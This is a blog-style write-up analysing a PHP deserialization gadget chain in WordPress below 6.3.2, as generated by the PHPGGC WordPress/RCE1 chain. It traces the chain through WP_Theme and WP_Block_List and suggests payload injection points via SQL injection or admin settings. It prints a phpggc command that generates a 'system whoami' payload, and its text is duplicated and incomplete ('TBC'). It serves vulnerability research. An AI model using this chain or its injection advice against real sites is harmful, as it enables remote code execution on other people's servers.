Wordpress POP chain

Recently, I happened to come across a WordPress site in practice, and found that I had not paid attention to the vulnerabilities in the PHP framework for a long time, so I went to PHPGGC to see if there were any "interesting" RCEs. I happened to see the WordPress/RCE/1 link and analyzed it carefully. The process is quite interesting

WordPress < 6.3.2, there is a desequence chain, starting from __toString in WP_Theme and ending with the dispatch method of WpOrg\Requests\Hooks.

WP_Block_List class :

In WordPress, WP_Block_Listclasses are one of the core classes used to manage and manipulate blocks on pages. Blocks are the basic building blocks of the WordPress editor and are used to create and organize content.

WP_Block_ListThe class provides a range of methods for working with blocks, including the following functionality:

WP_Theme：

In WordPress, the WP_Theme class is a class used to handle and manage themes. It provides a set of methods and properties for obtaining theme information, style and template files, parent-child theme relationships, etc.

WP_Block_Type_Registry：

The WP_Block_Type_Registry class is a class used to manage and register block types (Block Type). It provides a set of methods and functions for registering, retrieving and manipulating block types. Developers can easily register, obtain and manage block types. Block type is a core concept in the Gutenberg editor, which defines a reusable block with its own properties, styles and rendering logic. The WP_Block_Type_Registry class provides a mechanism that allows developers to extend and customize the WordPress editing experience through custom block types.

WpOrg\Requests\Session：

WpOrg\Requests\Session is a class used to handle session data. It provides a set of methods and functions for managing and storing session data in WordPress applications.

WpOrg\Requests\Hooks：

The methods of the Wp_Hook class allow developers to customize and extend WordPress functionality by adding, removing, and executing callback functions. By using action hooks and filter hooks, developers can intervene in the WordPress execution process at the appropriate time and modify data, add functionality, or change output.

This can successfully execute the aaa method in hello, which often occurs in CTF

Variable functions : Variable functions (Variable Functions) are a special syntax that allows functions to be called through variables. This means that the function name can be stored in a variable and the function dynamically called from that variable when needed.

php phpggc WordPress/RCE1 system whoami -u

function call stack

Debugging analysis

first step :

Start with a test file

The $obj obtained through deserialization is a WP_Theme object, and using echo to output the object will trigger the __toString method of the object.

Step two :

Enter the __toString method of wp-includes/class-wp-theme.php

Pass in the string Name and enter the display method of the object.

The $header here is the string Name, which is still in the class. Enter the get method.

$this->headers[$header] here is similar to accessing array elements, and the headers attribute can be controlled. Set it to a class that implements the ArrayAccess interface, so that the offsetGet, offsetSet, offsetExists, and offsetUnset methods of the class will be called. Element operations here, $this->headers is set to a WP_Block_List object. This class implements the ArrayAccess interface, so that the offsetGet method will be entered during the $this->headers[$header] operation, where $header is still the string Name.

third step :

Enter the offsetGet method of wp-includes/class-wp-block-list.php

Similarly, all attributes in the WP_Block_List object can be controlled. To achieve the key point, the if condition needs to be met, that is, the blocks attribute must have a Name key and be an array.

A WP_Block object will be instantiated here, and the parameters are controllable

….

TBC

First, you need to find the deserialization point. The method maybe_unserialize exists in WordPress and will deserialize the incoming data.

function maybe_unserialize( $data ) {
    if ( is_serialized( $data ) ) { // Don't attempt to unserialize data that wasn't serialized going in.
        return @unserialize( trim( $data ) );
    }    return $data;
}

Payload injection point:

Generally speaking, this effect can be achieved by writing malicious payloads into the database through SQL injection vulnerabilities. As mentioned in the wpscan report, if a SQL injection vulnerability exists, new rows will be inserted into the wp_termmeta table, and the inserted metadata will be retrieved during retrieval. After maybe_unserialize, causing RCE

In fact, setting the administrator's user name, site name, etc. to malicious payloads can cause RCE.

Recently, I happened to come across a WordPress site in practice, and found that I had not paid attention to the vulnerabilities in the PHP framework for a long time, so I went to PHPGGC to see if there were any "interesting" RCEs. I happened to see the WordPress/RCE/1 link and analyzed it carefully. The process is quite interestin

WordPress < 6.3.2, there is a desequence chain, starting from __toString in WP_Theme and ending with the dispatch method of WpOrg\Requests\Hooks.

WP_Block_List class :

In WordPress, WP_Block_Listclasses are one of the core classes used to manage and manipulate blocks on pages. Blocks are the basic building blocks of the WordPress editor and are used to create and organize content.

WP_Block_ListThe class provides a range of methods for working with blocks, including the following functionality:

WP_Theme：

In WordPress, the WP_Theme class is a class used to handle and manage themes. It provides a set of methods and properties for obtaining theme information, style and template files, parent-child theme relationships, etc.

WP_Block_Type_Registry：

The WP_Block_Type_Registry class is a class used to manage and register block types (Block Type). It provides a set of methods and functions for registering, retrieving and manipulating block types. Developers can easily register, obtain and manage block types. Block type is a core concept in the Gutenberg editor, which defines a reusable block with its own properties, styles and rendering logic. The WP_Block_Type_Registry class provides a mechanism that allows developers to extend and customize the WordPress editing experience through custom block types.

WpOrg\Requests\Session：

WpOrg\Requests\Session is a class used to handle session data. It provides a set of methods and functions for managing and storing session data in WordPress applications.

WpOrg\Requests\Hooks：

The methods of the Wp_Hook class allow developers to customize and extend WordPress functionality by adding, removing, and executing callback functions. By using action hooks and filter hooks, developers can intervene in the WordPress execution process at the appropriate time and modify data, add functionality, or change output.

This can successfully execute the aaa method in hello, which often occurs in CTF

Variable functions : Variable functions (Variable Functions) are a special syntax that allows functions to be called through variables. This means that the function name can be stored in a variable and the function dynamically called from that variable when needed.

php phpggc WordPress/RCE1 system whoami -u

function call stack

Debugging analysis

first step :

Start with a test file

The $obj obtained through deserialization is a WP_Theme object, and using echo to output the object will trigger the __toString method of the object.

Step two :

Enter the __toString method of wp-includes/class-wp-theme.php

Pass in the string Name and enter the display method of the object.

The $header here is the string Name, which is still in the class. Enter the get method.

$this->headers[$header] here is similar to accessing array elements, and the headers attribute can be controlled. Set it to a class that implements the ArrayAccess interface, so that the offsetGet, offsetSet, offsetExists, and offsetUnset methods of the class will be called. Element operations here, $this->headers is set to a WP_Block_List object. This class implements the ArrayAccess interface, so that the offsetGet method will be entered during the $this->headers[$header] operation, where $header is still the string Name.

third step :

Enter the offsetGet method of wp-includes/class-wp-block-list.php

Similarly, all attributes in the WP_Block_List object can be controlled. To achieve the key point, the if condition needs to be met, that is, the blocks attribute must have a Name key and be an array.

A WP_Block object will be instantiated here, and the parameters are controllable

….

TBC

First, you need to find the deserialization point. The method maybe_unserialize exists in WordPress and will deserialize the incoming data.

function maybe_unserialize( $data ) {
    if ( is_serialized( $data ) ) { // Don't attempt to unserialize data that wasn't serialized going in.
        return @unserialize( trim( $data ) );
    }    return $data;
}

Payload injection point:

Generally speaking, this effect can be achieved by writing malicious payloads into the database through SQL injection vulnerabilities. As mentioned in the wpscan report, if a SQL injection vulnerability exists, new rows will be inserted into the wp_termmeta table, and the inserted metadata will be retrieved during retrieval. After maybe_unserialize, causing RCE

In fact, setting the administrator's user name, site name, etc. to malicious payloads can cause RCE

Wordpress POP chain

Preface

describe

Related classes

Trick

trigger

describe

Related classes

Trick

trigger